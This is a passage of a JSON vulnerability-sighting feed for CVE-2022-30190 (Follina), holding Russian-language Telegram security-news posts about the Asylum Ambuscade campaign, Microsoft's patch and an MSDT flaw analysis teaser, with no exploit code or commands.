\u043c\u0430\u0440\u0442\u0435 2022 \u0433\u043e\u0434\u0430.\n\n\u041f\u043e \u043d\u043e\u0432\u044b\u043c \u0434\u0430\u043d\u043d\u044b\u043c ESET, \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 Asylum Ambuscade \u0432 \u0441\u0432\u043e\u0438\u0445 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f\u0445 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0435 \u043f\u0438\u0441\u044c\u043c\u0430 \u0441 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c\u0438 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0442 \u0437\u043b\u043e\u0432\u0440\u0435\u0434\u043d\u044b\u0439 VBScript-\u043a\u043e\u0434 \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2022-30190 . \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b Sunseed, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u0432\u0442\u043e\u0440\u0438\u0447\u043d\u044b\u0439 \u043c\u043e\u0434\u0443\u043b\u044c Akhbot \u0441 C2-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432.\n\n\u0412 2023 \u0433\u043e\u0434\u0443 Asylum Ambuscade \u0440\u0430\u0441\u0448\u0438\u0440\u0438\u043b\u0430 \u0441\u0432\u043e\u044e \u0446\u0435\u043b\u0435\u0432\u0443\u044e \u0430\u0443\u0434\u0438\u0442\u043e\u0440\u0438\u044e, \u0430\u0442\u0430\u043a\u0443\u044f \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0431\u0430\u043d\u043a\u043e\u0432, \u0442\u0440\u0435\u0439\u0434\u0435\u0440\u043e\u0432 \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442, \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u043e\u0440\u0433\u0430\u043d\u044b \u0438 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u043c\u0430\u043b\u044b\u0435 \u0438 \u0441\u0440\u0435\u0434\u043d\u0438\u0435 \u0431\u0438\u0437\u043d\u0435\u0441\u044b \u0432 \u0421\u0435\u0432\u0435\u0440\u043d\u043e\u0439 \u0410\u043c\u0435\u0440\u0438\u043a\u0435, \u0415\u0432\u0440\u043e\u043f\u0435 \u0438 \u0426\u0435\u043d\u0442\u0440\u0430\u043b\u044c\u043d\u043e\u0439 \u0410\u0437\u0438\u0438.\n\nESET \u043e\u0442\u043c\u0435\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043d\u043e\u0432\u044b\u0435 \u0432\u0435\u043a\u0442\u043e\u0440\u044b \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0443\u044e \u0440\u0435\u043a\u043b\u0430\u043c\u0443 Google, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u0435\u0440\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043d\u0430 \u0441\u0430\u0439\u0442\u044b \u0441 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c JavaScript-\u043a\u043e\u0434\u043e\u043c. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0441 \u043c\u0430\u0440\u0442\u0430 2023 \u0433\u043e\u0434\u0430 \u0445\u0430\u043a\u0435\u0440\u044b \u043d\u0430\u0447\u0430\u043b\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0442\u044c \u043d\u043e\u0432\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 Nodebot, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u0440\u0442\u043e\u043c Ahkbot \u043d\u0430 Node.js.\n\n\u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430 \u043c\u043e\u0436\u0435\u0442 \u0434\u0435\u043b\u0430\u0442\u044c \u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442\u044b, \u0432\u044b\u0442\u0430\u0441\u043a\u0438\u0432\u0430\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u0438 \u0438\u0437 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u0432 Internet Explorer, Firefox \u0438 Chromium, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0442\u044c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u043f\u043b\u0430\u0433\u0438\u043d\u044b AutoHotkey \u043d\u0430 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e. \u042d\u0442\u0438 \u043f\u043b\u0430\u0433\u0438\u043d\u044b \u0438\u043c\u0435\u044e\u0442 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u0443\u044e \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u044c, \u0442\u0430\u043a\u0443\u044e \u043a\u0430\u043a \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430 Cobalt Strike, \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 Chrome \u0434\u043b\u044f hVNC, \u0437\u0430\u043f\u0443\u0441\u043a \u043a\u0435\u0439\u043b\u043e\u0433\u0433\u0435\u0440\u0430, \u0440\u0430\u0437\u0432\u0451\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u0435 \u0438\u043d\u0444\u043e\u0441\u0442\u0438\u043b\u0435\u0440\u0430 Rhadamanthys, \u0437\u0430\u043f\u0443\u0441\u043a \u043a\u043e\u043c\u043c\u0435\u0440\u0447\u0435\u0441\u043a\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0433\u043e RAT \u0438 \u0434\u0440\u0443\u0433\u043e\u0435.\n\n\u041f\u043e \u043e\u0446\u0435\u043d\u043a\u0430\u043c ESET, Asylum Ambuscade \u0437\u0430\u0440\u0430\u0437\u0438\u043b\u0430 \u043e\u043a\u043e\u043b\u043e 4500 \u0436\u0435\u0440\u0442\u0432 \u0441 \u044f\u043d\u0432\u0430\u0440\u044f 2022 \u0433\u043e\u0434\u0430, \u0447\u0442\u043e \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e 265 \u0436\u0435\u0440\u0442\u0432 \u0432 \u043c\u0435\u0441\u044f\u0446. \u042d\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442 \u0434\u0430\u043d\u043d\u0443\u044e \u0433\u0440\u0443\u043f\u043f\u0443 \u0432\u0435\u0441\u044c\u043c\u0430 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439 \u0443\u0433\u0440\u043e\u0437\u043e\u0439 \u0434\u043b\u044f \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443.\n\n\u0426\u0435\u043b\u0438 \u0438 \u043c\u043e\u0442\u0438\u0432\u044b Asylum Ambuscade \u043f\u043e\u043a\u0430 \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u043d\u0435\u044f\u0441\u043d\u044b\u043c\u0438. \u0425\u043e\u0442\u044f \u0445\u0430\u043a\u0435\u0440\u044b \u044f\u0432\u043d\u043e \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u044b \u043d\u0430 \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442\u044b \u0438 \u0431\u0430\u043d\u043a\u043e\u0432\u0441\u043a\u0438\u0435 \u0441\u0447\u0435\u0442\u0430 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0431\u044b\u043b\u0438, \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u0435 SMB-\u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u043c\u043e\u0436\u0435\u0442 \u0442\u0430\u043a\u0436\u0435 \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0442\u044c \u043d\u0430 \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436.\n\n\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e, \u0445\u0430\u043a\u0435\u0440\u044b \u043f\u0440\u043e\u0434\u0430\u044e\u0442 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u0435\u0442\u044f\u043c \u044d\u0442\u0438\u0445 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u0434\u0440\u0443\u0433\u0438\u043c \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0430\u043c \u0434\u043b\u044f \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0441\u043e\u0444\u0442\u0430, \u043e\u0434\u043d\u0430\u043a\u043e ESET \u043d\u0435 \u043d\u0430\u0448\u043b\u0430 \u043d\u0438\u043a\u0430\u043a\u0438\u0445 \u0434\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c\u0441\u0442\u0432 \u044d\u0442\u043e\u0439 \u0433\u0438\u043f\u043e\u0442\u0435\u0437\u044b.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2023-06-10T07:56:00.000000Z"}, {"uuid": "0b46dfd9-20f9-4be2-bf74-98c0fa5dc50a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/codeby_sec/6083", "content": "\u200b\ud83e\udda0 Microsoft \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Follina\n\nMicrosoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 \u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435\u043c Windows \u0437\u0430 \u0438\u044e\u043d\u044c 2022 \u0433\u043e\u0434\u0430 \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f. \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0439 \u043a\u0430\u043a Follina. \u041e\u0448\u0438\u0431\u043a\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0449\u0438\u0445\u0441\u044f \u0430\u0442\u0430\u043a\u0430\u0445.\n\n\u00abMicrosoft \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442 \u043a\u043b\u0438\u0435\u043d\u0442\u0430\u043c \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u043f\u043e\u043b\u043d\u043e\u0439 \u0437\u0430\u0449\u0438\u0442\u044b \u043e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438. \u041a\u043b\u0438\u0435\u043d\u0442\u0430\u043c, \u0447\u044c\u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043d\u044b \u043d\u0430 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439, \u043d\u0435 \u043d\u0443\u0436\u043d\u043e \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0442\u044c \u043d\u0438\u043a\u0430\u043a\u0438\u0445 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439\u00bb, \u2014 \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u0441\u044f \u0432 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438.\n\n\u041e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u0430\u044f \u043a\u0430\u043a CVE-2022-30190, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u043f\u0438\u0441\u0430\u043d\u0430 \u043a\u0430\u043a \u043e\u0448\u0438\u0431\u043a\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u043e\u0432 Microsoft Windows Support Diagnotic Tool (MSDT), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432\u0441\u0451 \u0435\u0449\u0451 \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0449\u0438\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (Windows 7+, Windows Server 2008+).\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u044d\u0442\u0443 \u043e\u0448\u0438\u0431\u043a\u0443 \u0432 \u0441\u0432\u043e\u0438\u0445 \u0446\u0435\u043b\u044f\u0445, \u043c\u043e\u0433\u0443\u0442 \u0431\u0435\u0437 \u0442\u0440\u0443\u0434\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f. \u0422\u0430\u043a\u0436\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u0435\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0434\u043b\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c, \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445 \u0438 \u0434\u0430\u0436\u0435 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043d\u043e\u0432\u044b\u0445 \u0443\u0447\u0451\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439.\n\n\u041c\u044b \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c \u0432\u0441\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043d\u043e\u0432\u043e\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043e\u0442 Microsoft.\n\n\ud83d\uddde \u0411\u043b\u043e\u0433 \u041a\u043e\u0434\u0435\u0431\u0430\u0439\n\n#microsoft #windows", "creation_timestamp": "2022-06-15T20:37:27.000000Z"}, {"uuid": "c1e21988-76a1-499d-9670-5b4c73e347f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/codeby_sec/6037", "content": "\u200bCVE-2022-30190. \u0420\u0430\u0437\u0431\u043e\u0440 MSDT \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\n\n\u041f\u0440\u0438\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e, Codeby! \u0412 \u044d\u0442\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435 \u043c\u044b \u0440\u0430\u0437\u0431\u0435\u0440\u0435\u043c \u043a\u0430\u043a \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 CVE-2022-30190 \u0438 \u043d\u0430 \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0435 \u0438\u0441\u043f\u044b\u0442\u0430\u0435\u043c \u0434\u0430\u043d\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c. 27 \u043c\u0430\u044f \u043d\u0430 VirusTotal \u043f\u043e\u0441\u0442\u0443\u043f\u0438\u043b \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 Microsoft Office \u0441\u043e \u0441\u0442\u0440\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0432\u0440\u0435\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u044b\u043b\u0430 \u043e\u043f\u043e\u0437\u043d\u0430\u043d\u0430 \u043a\u0430\u043a 0-day, \u0447\u0442\u043e \u0434\u0435\u043b\u0430\u043b\u043e \u0435\u0435 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445. \u0420\u0438\u0441\u043a \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0442\u043e\u043b\u044c\u043a\u043e \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u044b \u0441\u043e \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u043c \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u043c MSDT URI \u0438 \u0441 \u041e\u0421 Winows. \u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0442\u0430\u043a-\u0436\u0435 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u043c\u0430\u043a\u0440\u043e\u0441\u043e\u0432, \u0447\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442 \u0430\u0442\u0430\u043a\u0443 \u0435\u0449\u0435 \u043b\u0435\u0433\u0447\u0435, \u0432\u0441\u0435 \u0447\u0442\u043e \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 - \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u044e\u0440\u043b \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c MSDT URI \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f powershell \u043a\u043e\u043c\u0430\u043d\u0434.\n\n\ud83d\udccc \u0427\u0438\u0442\u0430\u0442\u044c \u0441\u0442\u0430\u0442\u044c\u044e\n\n#cve #rce #windows", "creation_timestamp": "2022-06-08T17:42:42.000000Z"}, {"uuid": "0901c9ec-e50e-4fb8-96c5-051729927a35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/HXnB78LZ993EnbGXdL2hofKwYDoKHSeDPKMDrtCNi3QDgzw", "content": "", "creation_timestamp": "2025-08-14T09:00:04.000000Z"}, {"uuid": "fdee8266-f54a-4cdf-8a4d-d5f7ad7af883", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/codeby_sec/5990", "content": "\u200b\ud83d\udccb Microsoft \u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0430 \u0434\u0435\u0442\u0430\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Microsoft Office\n\n\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Microsoft \u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0430 \u0434\u0435\u0442\u0430\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432\u043e \u0432\u0441\u0435\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0441\u0432\u043e\u0435\u0433\u043e \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0438 \u043e\u0431\u043b\u0430\u0447\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430 Microsoft Office. \u0414\u0430\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u043f\u043e\u0434 \u043d\u043e\u043c\u0435\u0440\u043e\u043c CVE-2022-30190.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u0432\u0435\u0440\u0441\u0438\u0438 Microsoft Office \u0441 2016 \u043f\u043e 2021 \u0438 Office 365. \u0412 \u0441\u0435\u0442\u0438 \u0443\u0436\u0435 \u0435\u0441\u0442\u044c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0438\u0439, \u0447\u0442\u043e \u0434\u0430\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u043f\u0440\u0438 \u0430\u0442\u0430\u043a\u0430\u0445. \u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u0443\u0436\u0435 \u043f\u0440\u0438\u0432\u0435\u043b\u0438 \u043f\u0440\u0438\u043c\u0435\u0440 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430, \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0432 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0444\u0430\u0439\u043b Microsoft Word.\n\n\u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u044d\u0442\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 \u0432\u044b\u0437\u044b\u0432\u0430\u044e\u0449\u0435\u0433\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f. \u0421\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u043e\u043b\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f.\n\n\ud83d\uddde \u0411\u043b\u043e\u0433 \u041a\u043e\u0434\u0435\u0431\u0430\u0439\n\n#microsoft #vulnerability", "creation_timestamp": "2022-05-31T12:49:38.000000Z"}, {"uuid": "8965fd15-5fc9-41be-8c34-36fd584e95f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/3-wbVOTdAjOivPyAG2QBt9XaBCAIVLRC_c7I1h87YthbEus", "content": "", "creation_timestamp": "2026-01-08T15:00:07.000000Z"}, {"uuid": "e20dd3a0-50fd-4cfd-b1ce-535e0983d8ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": 